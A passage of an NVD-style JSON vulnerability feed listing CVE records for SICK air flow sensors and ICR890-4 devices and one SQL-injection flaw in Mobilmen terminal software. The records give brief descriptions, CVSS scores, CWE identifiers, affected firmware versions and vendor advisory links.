interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":6.2,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.5,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-836"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-287"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[
{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"c
riteria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-31409","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.550","lastModified":"2026-06-01T13:16:23.757","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Uncontrolled Resource Consumption in SICK FTMg AIR FLOW SENSOR with Partnumbers 1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an remote attacker to influence the availability of the webserver by invocing a Slowloris style attack via HTTP 
requests."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-400"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-400"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"op
erator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"1DCC9C0B-7CCE-44E5-B25D-67BF971B4541"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"290B016B-20B7-40C1-B825-6ED4774C4861"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esn50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E23D6018-1DFB-4516-82C9-3A3B09C2CBF9"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esn50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"1B113D9E-8E61-4F9C-9E5B-2030EEFB133B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr50sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"77F2683F-B1B5-4033-97D4-ADF77B6B50E8"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr50sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"A02547D3-5E40-41B3-A7B4-D63F60A5F80B"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esr40sxx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"9075A02A-C627-43DA-ACF7-776197B518C5"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esr40sxx:-:*:*:*:*:*:*:*","matchCriteriaId":"7B887993-18A8-493F-97A1-A788FBD5A5B9"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd15axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E9219CD8-34CE-45A2-904A-E7B1740706C2"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"crite
ria":"cpe:2.3:h:sick:ftmg-esd15axx:-:*:*:*:*:*:*:*","matchCriteriaId":"FF162AA9-6645-4032-8D29-BAE2D60FBD9B"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0004.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2023-1508","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-05-23T21:15:08.967","lastModified":"2026-06-01T13:16:22.477","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Adam Retail Automation Systems Mobilmen Terminal Software allows SQL Injection.\n\nThis issue affects Mobilmen Terminal Software: before 
3."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:adampos:mobilmen_el_terminali_yazilimi:*:*:*:*:*:*:*:*","versionEndExcluding":"3","matchCriteriaId":"48EB8DC9-8685-41FC-9A00-98AEA1F55F73"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0284","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0284","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0284","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-35696","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.800","lastModified":"2026-06-01T13:16:23.897","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Unauthenticated endpoints in the SICK ICR890-4 could allow an unauthenticated\nremote attacker to retrieve sensitive information about the device via HTTP 
requests."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-668"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-668"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor 
Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-35697","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.877","lastModified":"2026-06-01T13:16:24.033","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Restriction of Excessive Authentication Attempts in the SICK ICR890-4\ncould allow a remote attacker to brute-force user credentials."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-307"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-307"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","neg
ate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-35698","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.937","lastModified":"2026-06-01T13:16:24.160","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Observable Response Discrepancy in the SICK ICR890-4 could allow a remote attacker to identify valid usernames for the FTP server from the response given during a failed 
login\nattempt."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-204"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-203"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor 
Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-35699","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:52.993","lastModified":"2026-06-01T13:16:24.283","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Cleartext Storage on Disk in the SICK ICR890-4 could allow an unauthenticated attacker with local access to the device to disclose sensitive information by accessing a SD card."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":4.0},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":4.6,"baseSeverity":"MEDIUM","attackVector":"PHYSICAL","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":0.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-313"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-312"}]}],"configurations":[{"operator"
:"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-3271","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:55.443","lastModified":"2026-06-01T13:16:24.463","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in the SICK ICR890-4 could allow an unauthenticated remote attacker to gather information about the system and download data via the REST API by accessing\nunauthenticated 
endpoints."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L","baseScore":8.2,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":4.2},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:icr890-4_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.5.0","matchCriteriaId":"C9781FA2-2446-4587-8BBA-1AC342BC5A0F"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:icr890-4:-:*:*:*:*:*:*:*","matchCriteriaId":"8E1AF1D7-8380-4B5C-8258-214F00638CC2"}]}]}],"references":[{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"psirt@sick.de","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"psirt@sick.de","tags":["Vendor 
Advisory"]},{"url":"https://sick.com/psirt","source":"psirt@sick.de","tags":["Product"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.json","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/.well-known/csaf/white/2023/sca-2023-0006.pdf","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Vendor Advisory"]},{"url":"https://sick.com/psirt","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Product"]}]}},{"cve":{"id":"CVE-2023-3272","sourceIdentifier":"psirt@sick.de","published":"2023-07-10T16:15:55.507","lastModified":"2026-06-01T13:16:24.587","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Cleartext Transmission of Sensitive Information in the SICK ICR890-4 could allow a\nremote attacker to gather sensitive information by intercepting network traffic that is not encrypted."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-319"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-319"}]}],"configurations":[{"oper
